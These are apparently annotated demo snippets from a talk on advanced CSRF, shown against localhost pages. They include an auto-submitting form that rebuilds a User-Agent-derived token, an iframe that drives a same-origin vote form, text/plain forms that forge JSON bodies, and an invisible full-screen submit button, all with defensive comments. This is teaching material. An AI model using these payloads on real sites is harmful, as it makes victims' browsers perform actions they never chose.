// Token derivation and presence check, presumably the server side of the
// leaking/index.php demo that the page's first form posts to (confirm against the talk).
// The "token" is sha1() of the User-Agent request header. The browser sends that
// header to every site, so the digest is not a secret: it can be recomputed by
// anyone who sees the header. An anti-CSRF token has to be unpredictable and bound
// to the session, e.g. generated with random_bytes(), kept in $_SESSION and compared
// with hash_equals().
$token = sha1($_SERVER['HTTP_USER_AGENT']);
// Only the presence of a posted token is tested here; the comparison against
// $token is not shown in this fragment.
if (isset($_POST['token'])) {
// (The two lines above are repeated verbatim on the page.)
$token = sha1($_SERVER['HTTP_USER_AGENT']);
if (isset($_POST['token'])) {
<!--
Demo page showing why a token derived from the User-Agent gives no CSRF protection.
On load it computes CryptoJS.SHA1(navigator.userAgent) in the browser, writes the digest
into the "token" field and posts the form to leaking/index.php, with the response
targeted at the named iframe. The page never reads anything from the target site;
the token is rebuilt purely from data the browser already exposes to script.
Mitigation on the target: issue a random per-session token, compare it in constant time,
and set SameSite on the session cookie.
NOTE(review): <header> is a body sectioning element; the document head is <head>.
NOTE(review): the hashing library is fetched over plain http from a third-party host with
no integrity attribute, so the script content is not authenticated.
-->
<html>
<header>
<script
src="http://crypto-js.googlecode.com/svn/tags/3.1.2/build/rollups/sha1.js"></script>
</header>
<body onload="loaded();" >
<iframe name="iframe"></iframe>
<form name="frmCSRF" method="POST"
action="http://localhost/advanced-csrf/leaking/index.php" target="iframe">
<input type="text" name="token" id="token" value="" />
<textarea name="msg" cols="15" rows="5">harharhar</textarea>
</form>
<script type="text/javascript">
// Runs from <body onload>: fills in the recomputed token, then submits without user interaction.
function loaded() {
// Same input (User-Agent string) and same hash (SHA-1) as the server-side derivation.
document.getElementById('token').value = CryptoJS.SHA1(navigator.userAgent);
document.frmCSRF.submit();
}
</script>
</body>
</html>
<!--
The outer page reaches into the iframe's document through jQuery .contents(). Browsers
permit that only when the framed document is same-origin with the page; the src here is
the relative ./vote.php. The framed form is submitted as served, with whatever hidden
fields it carries, so a per-form anti-CSRF token does not separate this request from a
genuine one. Presumably the slide's point is that script running on the application's
own origin bypasses CSRF defences; confirm against the talk.
-->
<script type="text/javascript">
// Called from the iframe's onload handler once vote.php has rendered.
function loaded() {
// Mark the option whose value is "banana" as selected inside the framed form.
$("#ifr").contents().find("select option[value=banana]").attr("selected",true);
// Submit the framed form.
$("#ifr").contents().find("form").submit();
}
</script>
<iframe onload="javascript:loaded()" id="ifr" src="./vote.php"></iframe>
{ "subscribe_to": "weekly_newsletter", "mail": "john@doe.com" }
<!--
Demo form for subscribe.php, which apparently accepts a JSON request body.
enctype="text/plain" makes the browser send the single field as raw name=value text. The
field name and value are chosen so that this text parses as a JSON object, with the
"ignore_me" member absorbing the "=" separator. A plain HTML form on another origin can
therefore deliver a JSON-looking body along with whatever cookies the browser attaches.
Server-side checks that address this: accept only Content-Type: application/json (an
HTML form cannot set it, and cross-origin script requests using it trigger a CORS
preflight), require a per-session anti-CSRF token or a custom request header, and set
SameSite on the session cookie.
NOTE(review): the mail value here reads "hon@doe.com" while the neighbouring samples use
"john@doe.com"; probably a typo.
-->
<form method="POST"
action="http://localhost/advanced-csrf/ex2-3/subscribe.php"
enctype="text/plain">
<input type='text'
name='{"subscribe_to":"weekly_newsletter","mail":"hon@doe.com", "ignore_me":"'
value='"}' />
<input type="submit" value="send" />
</form>
{ 'subscribe_to': 'weekly_newsletter', 'mail': 'john@doe.com', 'ignore_me': '"}' }
<!--
Same text/plain form encoding as the subscribe example, here aimed at api.php with a
state-changing action ("reset-voting"). The submit button is styled position:fixed at
100% width and height with opacity 0, so it covers the whole viewport invisibly and a
click anywhere on the page submits the form.
Defensive takeaway: a JSON API that changes state should reject bodies not sent as
Content-Type: application/json and should still require an anti-CSRF token or custom
header; SameSite cookies limit what a cross-site form post can carry.
-->
<form method="POST"
action="http://localhost/advanced-csrf/ex2-4/api.php"
enctype="text/plain">
<input
type='text'
name='{"action":"reset-voting","value":"all", "ignore_me":"' value='"}' />
<input type='submit'
value="submit"
style="position:fixed;top:0;left:0;width:100%;height:100%;opacity:0;"
/>
</form>
audience.ask(questions);
This presentation is licensed under the
Creative Commons Attribution 4.0 International
license.